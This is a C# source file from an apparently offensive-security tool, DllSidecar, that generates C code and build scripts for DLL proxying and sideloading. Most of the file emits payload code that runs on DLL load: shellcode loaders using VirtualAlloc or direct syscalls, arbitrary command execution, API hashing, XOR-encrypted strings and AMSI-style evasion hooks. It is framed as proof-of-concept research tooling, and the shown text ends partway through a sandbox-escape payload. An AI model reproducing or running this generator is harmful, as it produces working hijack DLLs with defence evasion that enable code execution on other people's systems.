using System.Text;
using DllSidecar.Core.Configuration;
using DllSidecar.Core.Models;
using DllSidecar.Core.Helpers;

namespace DllSidecar.Core.Services;

public static class TemplateEngine
{
    public static Dictionary<string, string> Generate(PeAnalysis analysis, TemplateConfig config)
    {
        return config.Mode switch
        {
            GenerationMode.Tracer => GenerateTracer(analysis, config),
            GenerationMode.Proxy => GenerateProxy(analysis, config),
            GenerationMode.Sideload => GenerateSideload(analysis, config),
            _ => throw new ArgumentException($"Unknown mode: {config.Mode}")
        };
    }

    public static Dictionary<string, string> GenerateTracer(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";
        string renamed = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
        int numExports = exports.Count;

        var sb = new StringBuilder();

        // Includes
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        sb.AppendLine();

        // Header
        sb.AppendLine($"/* === DllSidecar ExportTracer === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} */");
        sb.AppendLine($"/* Generated by DllSidecar — {config.Researcher} */");
        sb.AppendLine();

        // Globals
        sb.AppendLine("static HMODULE g_hOriginal = NULL;");
        sb.AppendLine($"void *g_orig_funcs[{numExports}];");
        sb.AppendLine("static HANDLE g_hLogFile = INVALID_HANDLE_VALUE;");
        sb.AppendLine($"static volatile LONG g_call_count[{numExports}] = {{0}};");
        sb.AppendLine();

        // Export names array
        sb.AppendLine($"static const char *g_export_names[{numExports}] = {{");
        sb.AppendLine("    " + string.Join(",\n    ", exports.Select(e => $"\"{e.DisplayName}\"")));
        sb.AppendLine("};");
        sb.AppendLine();

        // Tracer log callback
        sb.AppendLine("void __attribute__((used)) tracer_log(int index) {");
        sb.AppendLine($"    if (index < 0 || index >= {numExports}) return;");
        sb.AppendLine("    LONG count = InterlockedIncrement(&g_call_count[index]);");
        sb.AppendLine("    if (g_hLogFile != INVALID_HANDLE_VALUE) {");
        sb.AppendLine("        char buf[512];");
        sb.AppendLine("        DWORD written;");
        sb.AppendLine("        int len = wsprintfA(buf, \"[%04d] %-40s (calls: %ld)\\r\\n\",");
        sb.AppendLine("                            index, g_export_names[index], count);");
        sb.AppendLine("        WriteFile(g_hLogFile, buf, len, &written, NULL);");
        sb.AppendLine("    }");
        sb.AppendLine("}");
        sb.AppendLine();

        // Trampolines
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            sb.AppendLine(isX64
                ? AsmTrampolineX64(i, label, "tracer_log")
                : AsmTrampolineX86(i, label, "tracer_log"));
        }

        // DllMain
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        sb.Append(GenerateLoadOriginal(config, renamed, exports));
        sb.AppendLine("        g_hLogFile = CreateFileA(\"sidecar_trace.log\", GENERIC_WRITE,");
        sb.AppendLine("            FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);");
        sb.AppendLine("    } else if (fdwReason == DLL_PROCESS_DETACH) {");
        sb.AppendLine("        if (g_hLogFile != INVALID_HANDLE_VALUE) {");
        sb.AppendLine("            char buf[512]; DWORD written;");
        sb.AppendLine("            wsprintfA(buf, \"\\r\\n=== TRACE SUMMARY ===\\r\\n\");");
        sb.AppendLine("            WriteFile(g_hLogFile, buf, lstrlenA(buf), &written, NULL);");
        sb.AppendLine($"            for (int i = 0; i < {numExports}; i++) {{");
        sb.AppendLine("                if (g_call_count[i] > 0) {");
        sb.AppendLine("                    int len = wsprintfA(buf, \"[CALLED] %s (ordinal %d): %ld calls\\r\\n\",");
        sb.AppendLine("                        g_export_names[i], i, g_call_count[i]);");
        sb.AppendLine("                    WriteFile(g_hLogFile, buf, len, &written, NULL);");
        sb.AppendLine("                }");
        sb.AppendLine("            }");
        sb.AppendLine("            CloseHandle(g_hLogFile);");
        sb.AppendLine("        }");
        sb.AppendLine("        if (g_hOriginal) FreeLibrary(g_hOriginal);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"tracer_{baseName}";

        return new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateDefFile(analysis, exports, true),
            ["build_tracer.bat"] = GenerateBuildBat(analysis, config, srcName, "tracer"),
        };
    }

    public static Dictionary<string, string> GenerateProxy(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        // Proxy requires at least one export to forward — caller (UI) should enforce this,
        // but guard here too to turn an IndexOutOfRange into a clear ArgumentException.
        if (exports.Count == 0)
            throw new ArgumentException(
                "Proxy mode requires at least one export on the target DLL. Use Sideload mode for DLLs without exports (phantom case).",
                nameof(analysis));

        // When the user didn't pick a specific TargetExport, emit a PURE FORWARDER
        // proxy — .def forwards every export to <base>_orig.<name> at load time
        // via the Windows loader (no C trampolines, no g_orig_funcs[], no runtime
        // LoadLibrary of the original). This is what every manually-crafted sideload
        // PoC looks like (Adobe AID, MobaXterm WINMM, etc) — simpler, more reliable,
        // ~50 lines of .c vs 4700.
        // When the user DOES pick a TargetExport, fall through to the trampoline
        // variant below — it lets the payload fire on one specific exported call
        // in addition to DllMain, which matters for runtime-hook scenarios.
        if (string.IsNullOrEmpty(config.TargetExport))
            return GenerateProxyPureForwarder(analysis, config);

        bool isX64 = analysis.Arch == "x64";
        string renamed = Path.GetFileNameWithoutExtension(analysis.Filename) + "_orig.dll";
        int numExports = exports.Count;

        // -1 = no trampoline fires the payload (DllMain is the sole trigger).
        // Only set to a valid index when the user explicitly picked a TargetExport
        // — then BOTH DllMain and that trampoline call payload_execute, but the
        // once-guard inside ensures the payload runs exactly once per DLL load.
        int targetIdx = -1;
        if (config.TargetExport != null)
        {
            var idx = exports.FindIndex(e => e.Name == config.TargetExport);
            if (idx >= 0) targetIdx = idx;
        }

        var sb = new StringBuilder();

        // Includes
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        sb.Append(EmitEvasionIncludes(config, isX64));
        sb.AppendLine();

        // Header
        var triggerLabel = targetIdx >= 0
            ? $"DllMain + {exports[targetIdx].DisplayName} (idx {targetIdx})"
            : "DllMain (no export hook — default)";
        sb.AppendLine($"/* === DllSidecar ProxyDll === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} | Payload triggers: {triggerLabel} */");
        sb.AppendLine($"/* Thread mode: {config.Thread} | DInvoke: {config.DInvoke} | Encrypted: {config.EncryptStrings} */");
        sb.AppendLine($"/* Generated by DllSidecar — {config.Researcher} */");
        sb.AppendLine();

        // Globals
        sb.AppendLine("static HMODULE g_hOriginal = NULL;");
        sb.AppendLine($"void *g_orig_funcs[{numExports}];");
        // Once-guard so payload runs exactly one time, no matter if DllMain fires
        // first (normal path) or a trampoline fires first (when a specific export
        // was selected and called by the host before DllMain finishes somehow).
        sb.AppendLine("static volatile LONG g_payload_fired = 0;");
        sb.AppendLine();

        // Payload
        sb.AppendLine(GeneratePayload(config, isX64));
        sb.Append(EmitEvasionFunctions(config, isX64));
        sb.AppendLine();

        // Payload trigger — guarded once. Safe to call from DllMain or trampolines.
        sb.AppendLine("void __attribute__((used)) payload_execute(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("    if (InterlockedCompareExchange(&g_payload_fired, 1, 0) != 0) return;");
        sb.Append(GeneratePayloadInvoke(config));
        sb.AppendLine("}");
        sb.AppendLine();

        // Nop stub
        sb.AppendLine("void __attribute__((used)) nop_stub(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("}");
        sb.AppendLine();

        // Trampolines
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"tramp_{SafeLabel(exports[i].DisplayName)}";
            var callback = i == targetIdx ? "payload_execute" : "nop_stub";
            sb.AppendLine(isX64
                ? AsmTrampolineX64(i, label, callback)
                : AsmTrampolineX86(i, label, callback));
        }

        // DllMain — loads original, resolves forwards, then fires payload.
        // The payload call here is the default trigger; it guarantees execution
        // on DLL attach regardless of which export the host calls first (or even
        // if the host never calls any export, e.g. only LoadLibrary-then-unload).
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.DirectSyscalls)
            sb.AppendLine("        sc_init();");
        sb.Append(EmitEvasionInitCall(config, isX64));
        sb.Append(GenerateLoadOriginal(config, renamed, exports));
        sb.AppendLine("        payload_execute(-1);");
        sb.AppendLine("    } else if (fdwReason == DLL_PROCESS_DETACH) {");
        sb.AppendLine("        if (g_hOriginal) FreeLibrary(g_hOriginal);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"proxy_{baseName}";

        var trampolinedResult = new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateDefFile(analysis, exports, true),
            ["build_proxy.bat"] = GenerateBuildBat(analysis, config, srcName, "proxy"),
        };
        foreach (var (k, v) in LoadEvasionResources(config, isX64)) trampolinedResult[k] = v;
        return trampolinedResult;
    }

    /// <summary>
    /// Minimal Proxy variant — .def lets the Windows loader resolve every export to
    /// &lt;base&gt;_orig.&lt;name&gt; at load time. The .c stays tiny: DllMain fires the
    /// payload (once-guarded) and returns. No trampolines, no g_orig_funcs, no
    /// runtime LoadLibrary/GetProcAddress of the original. Match for every
    /// hand-crafted sideload PoC (Adobe AID, MobaXterm WINMM, etc.).
    /// </summary>
    private static Dictionary<string, string> GenerateProxyPureForwarder(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";

        var sb = new StringBuilder();
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        sb.Append(EmitEvasionIncludes(config, isX64));
        sb.AppendLine();

        sb.AppendLine($"/* === DllSidecar ProxyDll (pure-forwarder mode) === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {exports.Count} (all forwarded via .def to _orig.dll at load time) */");
        sb.AppendLine($"/* Thread mode: {config.Thread} | DInvoke: {config.DInvoke} | Encrypted: {config.EncryptStrings} */");
        sb.AppendLine($"/* Generated by DllSidecar — {config.Researcher} */");
        sb.AppendLine();

        // Once-guard — DllMain is the sole trigger here, but keep the pattern for
        // symmetry with the trampoline variant (and safety under weird re-entrancy).
        sb.AppendLine("static volatile LONG g_payload_fired = 0;");
        sb.AppendLine();

        sb.AppendLine(GeneratePayload(config, isX64));
        sb.Append(EmitEvasionFunctions(config, isX64));
        sb.AppendLine();

        sb.AppendLine("void __attribute__((used)) payload_execute(int index) {");
        sb.AppendLine("    (void)index;");
        sb.AppendLine("    if (InterlockedCompareExchange(&g_payload_fired, 1, 0) != 0) return;");
        sb.Append(GeneratePayloadInvoke(config));
        sb.AppendLine("}");
        sb.AppendLine();

        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.DirectSyscalls)
            sb.AppendLine("        sc_init();");
        sb.Append(EmitEvasionInitCall(config, isX64));
        sb.AppendLine("        payload_execute(-1);");
        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"proxy_{baseName}";
        var origBase = baseName + "_orig";

        var pureResult = new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = GenerateForwarderDefFile(analysis, exports, origBase),
            ["build_proxy.bat"] = GenerateBuildBat(analysis, config, srcName, "proxy"),
        };
        foreach (var (k, v) in LoadEvasionResources(config, isX64)) pureResult[k] = v;
        return pureResult;
    }

    /// <summary>
    /// .def file that tells the Windows loader to forward every NAMED export to
    /// &lt;origBase&gt;.dll at load time. Syntax matches what MinGW ld accepts (same
    /// format as every hand-written sideload PoC: "name = origbase.name").
    /// Ordinal-only exports are skipped — MinGW ld rejects the MSVC "DLL.#N"
    /// forwarder syntax (line 3 syntax error). In practice, hosts always import
    /// by name; ordinal-only slots in system DLLs tend to be internal helpers.
    /// </summary>
    private static string GenerateForwarderDefFile(PeAnalysis analysis, List<ExportEntry> exports, string origBase)
    {
        var sb = new StringBuilder();
        sb.AppendLine($"LIBRARY {Path.GetFileNameWithoutExtension(analysis.Filename)}");
        sb.AppendLine("EXPORTS");

        int skippedOrdinals = 0;
        foreach (var exp in exports)
        {
            if (exp.Name != null)
                sb.AppendLine($"    {exp.Name}={origBase}.{exp.Name}");
            else
                skippedOrdinals++;
        }

        if (skippedOrdinals > 0)
            sb.AppendLine($"; {skippedOrdinals} ordinal-only export(s) omitted — MinGW ld rejects DLL.#N forwarders.");

        return sb.ToString();
    }

    public static Dictionary<string, string> GenerateSideload(PeAnalysis analysis, TemplateConfig config)
    {
        var exports = analysis.Exports;
        bool isX64 = analysis.Arch == "x64";
        int numExports = exports.Count;

        var sb = new StringBuilder();

        // Includes
        sb.AppendLine("#include <windows.h>");
        sb.AppendLine("#include <stdio.h>");
        if (config.Payload == PayloadType.SandboxEscape) sb.AppendLine("#include <tlhelp32.h>");
        if (config.DInvoke) sb.AppendLine("#include \"dinvoke.h\"");
        if (config.DirectSyscalls) sb.AppendLine("#include \"syscalls.h\"");
        if (config.EncryptStrings) sb.AppendLine("#include \"cryptor.h\"");
        sb.Append(EmitEvasionIncludes(config, isX64));
        sb.AppendLine();

        sb.AppendLine($"/* === DllSidecar SideloadDll (stub mode) === */");
        sb.AppendLine($"/* Target: {analysis.Filename} ({analysis.Arch}) */");
        sb.AppendLine($"/* Exports: {numExports} (all stubs) */");
        sb.AppendLine($"/* Generated by DllSidecar — {config.Researcher} */");
        sb.AppendLine();

        // Payload
        sb.AppendLine(GeneratePayload(config, isX64));
        sb.Append(EmitEvasionFunctions(config, isX64));
        sb.AppendLine();

        // Stub exports
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"stub_{SafeLabel(exports[i].DisplayName)}";
            if (isX64)
                sb.AppendLine($"void {label}(void) {{ }}");
            else
                sb.AppendLine($"void __stdcall {label}(void) {{ }}");
        }
        sb.AppendLine();

        // DllMain
        sb.AppendLine("BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {");
        sb.AppendLine("    if (fdwReason == DLL_PROCESS_ATTACH) {");
        sb.AppendLine("        DisableThreadLibraryCalls(hinstDLL);");
        if (config.DelayMs > 0)
            sb.AppendLine(config.DInvoke ? $"        sc_delay({config.DelayMs});" : $"        Sleep({config.DelayMs});");
        if (config.DirectSyscalls)
            sb.AppendLine("        sc_init();");
        // Evasion init (AMSI hook etc.) runs before the payload so it intercepts
        // any AmsiScanBuffer the payload might trigger directly or transitively.
        sb.Append(EmitEvasionInitCall(config, isX64));

        // Payload invoke (one-shot)
        if (config.Thread == ThreadMode.Calling)
            sb.AppendLine("        do_payload();");
        else if (config.Thread == ThreadMode.Std)
            sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");
        else if (config.DirectSyscalls)
        {
            sb.AppendLine("        HANDLE hThread = NULL;");
            sb.AppendLine("        sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL,");
            sb.AppendLine("            (HANDLE)-1, (PVOID)do_payload, NULL, 0, 0, 0, 0, NULL);");
        }
        else
            sb.AppendLine("        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)do_payload, NULL, 0, NULL);");

        sb.AppendLine("    }");
        sb.AppendLine("    return TRUE;");
        sb.AppendLine("}");

        var baseName = Path.GetFileNameWithoutExtension(analysis.Filename);
        var srcName = $"sideload_{baseName}";

        // Def file with stubs
        var defSb = new StringBuilder();
        defSb.AppendLine($"LIBRARY {baseName}");
        defSb.AppendLine("EXPORTS");
        for (int i = 0; i < exports.Count; i++)
        {
            var label = $"stub_{SafeLabel(exports[i].DisplayName)}";
            if (exports[i].Name != null)
                defSb.AppendLine($"    {exports[i].Name} = {label} @{exports[i].Ordinal}");
            else
                defSb.AppendLine($"    ord_{exports[i].Ordinal} = {label} @{exports[i].Ordinal} NONAME");
        }

        var result = new Dictionary<string, string>
        {
            [$"{srcName}.c"] = sb.ToString(),
            [$"{srcName}.def"] = defSb.ToString(),
            ["build_sideload.bat"] = GenerateBuildBat(analysis, config, srcName, "sideload"),
        };
        foreach (var (k, v) in LoadEvasionResources(config, isX64)) result[k] = v;
        return result;
    }

    // ── Private helpers ──

    private static string SafeLabel(string name)
        => name.Replace("@", "_at_").Replace("?", "_q_").Replace("$", "_d_");

    private static string AsmTrampolineX64(int index, string label, string callback)
    {
        int offset = index * 8;
        return $"__attribute__((naked)) void {label}(void) {{\n"
             + "    __asm__ (\n"
             + "        \"push %rax\\n\"\n"
             + "        \"push %rcx\\n\"\n"
             + "        \"push %rdx\\n\"\n"
             + "        \"push %r8\\n\"\n"
             + "        \"push %r9\\n\"\n"
             + "        \"push %r10\\n\"\n"
             + "        \"push %r11\\n\"\n"
             + "        \"sub $0x28, %rsp\\n\"\n"
             + $"        \"mov ${index}, %ecx\\n\"\n"
             + $"        \"call {callback}\\n\"\n"
             + "        \"add $0x28, %rsp\\n\"\n"
             + "        \"pop %r11\\n\"\n"
             + "        \"pop %r10\\n\"\n"
             + "        \"pop %r9\\n\"\n"
             + "        \"pop %r8\\n\"\n"
             + "        \"pop %rdx\\n\"\n"
             + "        \"pop %rcx\\n\"\n"
             + "        \"pop %rax\\n\"\n"
             + "        \"lea g_orig_funcs(%rip), %r11\\n\"\n"
             + $"        \"jmp *{offset}(%r11)\\n\"\n"
             + "    );\n"
             + "}\n";
    }

    private static string AsmTrampolineX86(int index, string label, string callback)
    {
        int offset = index * 4;
        return $"__attribute__((naked)) void {label}(void) {{\n"
             + "    __asm__ (\n"
             + "        \"pusha\\n\"\n"
             + "        \"pushf\\n\"\n"
             + $"        \"push ${index}\\n\"\n"
             + $"        \"call _{callback}\\n\"\n"
             + "        \"add $4, %esp\\n\"\n"
             + "        \"popf\\n\"\n"
             + "        \"popa\\n\"\n"
             + $"        \"jmp *(_g_orig_funcs + {offset})\\n\"\n"
             + "    );\n"
             + "}\n";
    }

    private static string GenerateEncryptedString(string value, string varName, byte key)
    {
        var enc = XorCryptor.Encrypt(value, key);
        var hexBytes = XorCryptor.ToHexArray(enc);
        return $"        static unsigned char enc_{varName}[] = {{{hexBytes}}};\n"
             + $"        char {varName}[{value.Length + 1}];\n"
             + $"        xor_decrypt_to(enc_{varName}, {varName}, {value.Length}, 0x{key:X2});\n";
    }

    private static string GenerateLoadOriginal(TemplateConfig config, string renamed, List<ExportEntry> exports)
    {
        var sb = new StringBuilder();

        // Load DLL
        if (config.DInvoke && config.EncryptStrings)
        {
            sb.Append(GenerateEncryptedString(renamed, "dll_name", config.XorKey));
            sb.AppendLine("        g_hOriginal = dinvoke_load_module(dll_name);");
            sb.AppendLine("        PVOID hOrigMod = (PVOID)g_hOriginal;");
        }
        else if (config.DInvoke)
        {
            sb.AppendLine($"        g_hOriginal = dinvoke_load_module(\"{renamed}\");");
            sb.AppendLine("        PVOID hOrigMod = (PVOID)g_hOriginal;");
        }
        else if (config.EncryptStrings)
        {
            sb.Append(GenerateEncryptedString(renamed, "dll_name", config.XorKey));
            sb.AppendLine("        g_hOriginal = LoadLibraryA(dll_name);");
        }
        else
        {
            sb.AppendLine($"        g_hOriginal = LoadLibraryA(\"{renamed}\");");
        }
        sb.AppendLine("        if (!g_hOriginal) return FALSE;");

        // Resolve exports
        for (int i = 0; i < exports.Count; i++)
        {
            if (exports[i].Name is { } expName)
            {
                if (config.DInvoke)
                {
                    var h = Djb2.Hash(expName);
                    sb.AppendLine($"        g_orig_funcs[{i}] = (void *)dinvoke_get_proc(hOrigMod, 0x{h:X8}UL);");
                }
                else
                {
                    sb.AppendLine($"        g_orig_funcs[{i}] = (void *)GetProcAddress(g_hOriginal, \"{expName}\");");
                }
            }
            else
            {
                sb.AppendLine($"        g_orig_funcs[{i}] = (void *)GetProcAddress(g_hOriginal, (LPCSTR)MAKEINTRESOURCEA({exports[i].Ordinal}));");
            }
        }

        return sb.ToString();
    }

    private static string GeneratePayload(TemplateConfig config, bool isX64)
    {
        var cmd = string.IsNullOrEmpty(config.PayloadData) ? "cmd.exe" : config.PayloadData;
        var r = config.Researcher;

        if (config.Payload == PayloadType.Shellcode)
            return GenerateShellcodePayload(config);

        if (config.Payload == PayloadType.SandboxEscape)
            return GenerateSandboxEscapePayload(config);

        // Proof file write — prepended to MessageBox/Command payloads so even if
        // the visual UI is invisible (service desktop, X server like XWin_MobaX,
        // headless session), DllMain leaves a timestamped marker in %TEMP%.
        var proof = config.WriteProofFile ? GenerateProofFileSnippet() : "";

        // Command payload uses CreateProcessA with explicit lpDesktop = "WinSta0\\Default"
        // + CREATE_NEW_CONSOLE so the spawned window is visible even when the host process
        // runs without an interactive console (background services, updater agents like
        // Battle.net Agent.exe). WinExec inherits the parent's STARTUPINFO so the cmd
        // process exists but is invisible — that's exactly what "I see the process but no
        // usable console" means. CreateProcess with explicit desktop steering fixes it.
        if (config.Payload == PayloadType.Command)
            return "static void do_payload(void) {\n"
                 + proof
                 + "    STARTUPINFOA si; ZeroMemory(&si, sizeof(si));\n"
                 + "    si.cb = sizeof(si);\n"
                 + "    si.lpDesktop = (LPSTR)\"WinSta0\\\\Default\";\n"
                 + "    si.dwFlags = STARTF_USESHOWWINDOW;\n"
                 + "    si.wShowWindow = SW_SHOW;\n"
                 + "    PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi));\n"
                 + $"    CHAR cmdline[] = \"{cmd}\";\n"
                 + "    if (CreateProcessA(NULL, cmdline, NULL, NULL, FALSE,\n"
                 + "                       CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {\n"
                 + "        CloseHandle(pi.hProcess);\n"
                 + "        CloseHandle(pi.hThread);\n"
                 + "    }\n"
                 + "}\n";

        // MessageBox payload — body and title come from TemplateConfig so the
        // researcher can stamp the popup with case identifiers without hand-
        // editing generated C. {Researcher} placeholder substituted, then the
        // result is C-string-escaped (\\, \", \n) before embedding.
        var msgBody = CEscapeForLiteral(
            (config.MessageBoxBody ?? "").Replace("{Researcher}", r));
        var msgTitle = CEscapeForLiteral(
            (config.MessageBoxTitle ?? "").Replace("{Researcher}", r));
        if (string.IsNullOrEmpty(msgBody)) msgBody = "DLL Sideloading PoC";
        if (string.IsNullOrEmpty(msgTitle)) msgTitle = "DllSidecar PoC";

        if (config.Payload == PayloadType.MessageBox && config.DInvoke)
            return "static void do_payload(void) {\n"
                 + proof
                 + "    fn_LoadLibraryA pLLA = DINVOKE(H_KERNEL32_DLL, H_LOADLIBRARYA, fn_LoadLibraryA);\n"
                 + "    if (!pLLA) return;\n"
                 + "    HMODULE hUser32 = pLLA(\"user32.dll\");\n"
                 + "    if (!hUser32) return;\n"
                 + "    fn_MessageBoxA pMB = (fn_MessageBoxA)dinvoke_get_proc(hUser32, H_MESSAGEBOXA);\n"
                 + "    if (!pMB) return;\n"
                 + $"    pMB(NULL, \"{msgBody}\",\n"
                 + $"        \"{msgTitle}\", MB_ICONWARNING | MB_OK);\n"
                 + "}\n";

        // MessageBox without DInvoke
        return "static void do_payload(void) {\n"
             + proof
             + $"    MessageBoxA(NULL, \"{msgBody}\",\n"
             + $"        \"{msgTitle}\", MB_ICONWARNING | MB_OK);\n"
             + "}\n";
    }

    /// <summary>
    /// Escape a runtime string for embedding inside a C double-quoted literal:
    /// backslash → \\, double-quote → \", any newline (CR/LF/CRLF) → \n. Order
    /// matters — backslash first so we don't double-escape later sequences.
    /// </summary>
    private static string CEscapeForLiteral(string s) => s
        .Replace("\\", "\\\\")
        .Replace("\"", "\\\"")
        .Replace("\r\n", "\\n")
        .Replace("\n", "\\n")
        .Replace("\r", "\\n");

    /// <summary>
    /// C snippet that writes a proof-of-execution file to %TEMP%\dllsidecar_proof_&lt;pid&gt;.txt.
    /// Reliable across session isolation (where MessageBox may render to a non-interactive
    /// desktop), across headless services, and across CI-style silent hosts.
    /// Uses fopen/fprintf (msvcrt) — already linked by MinGW default.
    /// </summary>
    private static string GenerateProofFileSnippet()
    {
        return "    {\n"
             + "        char _proof_path[MAX_PATH], _proof_temp[MAX_PATH];\n"
             + "        GetTempPathA(MAX_PATH, _proof_temp);\n"
             + "        wsprintfA(_proof_path, \"%sdllsidecar_proof_%lu.txt\", _proof_temp, GetCurrentProcessId());\n"
             + "        FILE *_f = fopen(_proof_path, \"w\");\n"
             + "        if (_f) {\n"
             + "            SYSTEMTIME _st; GetLocalTime(&_st);\n"
             + "            fprintf(_f, \"DllSidecar PoC — payload fired\\n\"\n"
             + "                        \"PID: %lu\\n\"\n"
             + "                        \"Timestamp: %04d-%02d-%02d %02d:%02d:%02d\\n\",\n"
             + "                GetCurrentProcessId(), _st.wYear, _st.wMonth, _st.wDay,\n"
             + "                _st.wHour, _st.wMinute, _st.wSecond);\n"
             + "            fclose(_f);\n"
             + "        }\n"
             + "    }\n";
    }

    private static string GenerateShellcodePayload(TemplateConfig config)
    {
        var scHex = string.IsNullOrEmpty(config.PayloadData)
            ? new string('9', 32) + "CC"
            : config.PayloadData;
        var scBytes = string.Join(", ",
            Enumerable.Range(0, scHex.Length / 2).Select(i => $"0x{scHex.Substring(i * 2, 2)}"));
        int scLen = scHex.Length / 2;

        if (config.DirectSyscalls)
            return "static void do_payload(void) {\n"
                 + $"    unsigned char sc[] = {{{scBytes}}};\n"
                 + $"    PVOID mem = NULL; SIZE_T sz = {scLen}; ULONG old;\n"
                 + "    sc_NtAllocateVirtualMemory((HANDLE)-1, &mem, 0, &sz, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
                 + "    if (!mem) return;\n"
                 + $"    for (SIZE_T i = 0; i < {scLen}; i++) ((BYTE*)mem)[i] = sc[i];\n"
                 + "    sc_NtProtectVirtualMemory((HANDLE)-1, &mem, &sz, PAGE_EXECUTE_READ, &old);\n"
                 + "    HANDLE hThread = NULL;\n"
                 + "    sc_NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, (HANDLE)-1, mem, NULL, 0, 0, 0, 0, NULL);\n"
                 + "}\n";

        if (config.DInvoke)
            return "static void do_payload(void) {\n"
                 + $"    unsigned char sc[] = {{{scBytes}}};\n"
                 + "    fn_VirtualAlloc pVA = DINVOKE(H_KERNEL32_DLL, H_VIRTUALALLOC, fn_VirtualAlloc);\n"
                 + "    fn_VirtualProtect pVP = DINVOKE(H_KERNEL32_DLL, H_VIRTUALPROTECT, fn_VirtualProtect);\n"
                 + "    if (!pVA || !pVP) return;\n"
                 + $"    LPVOID mem = pVA(NULL, {scLen}, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
                 + "    if (!mem) return;\n"
                 + $"    for (int i = 0; i < {scLen}; i++) ((BYTE*)mem)[i] = sc[i];\n"
                 + $"    DWORD old; pVP(mem, {scLen}, PAGE_EXECUTE_READ, &old);\n"
                 + "    ((void(*)())mem)();\n"
                 + "}\n";

        return "static void do_payload(void) {\n"
             + $"    unsigned char sc[] = {{{scBytes}}};\n"
             + $"    LPVOID mem = VirtualAlloc(NULL, {scLen}, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);\n"
             + "    if (!mem) return;\n"
             + $"    for (int i = 0; i < {scLen}; i++) ((BYTE*)mem)[i] = sc[i];\n"
             + $"    DWORD old; VirtualProtect(mem, {scLen}, PAGE_EXECUTE_READ, &old);\n"
             + "    ((void(*)())mem)();\n"
             + "}\n";
    }

    /// <summary>
    /// Sandbox-escape payload: phantom DLL fires in AppContainer/LOW IL host where
    /// WinExec is neutralized by the policy. We enumerate siblings via Toolhelp,
    /// pick one we can OpenProcess(ALL_ACCESS) + VirtualAllocEx RWX (smoke test),
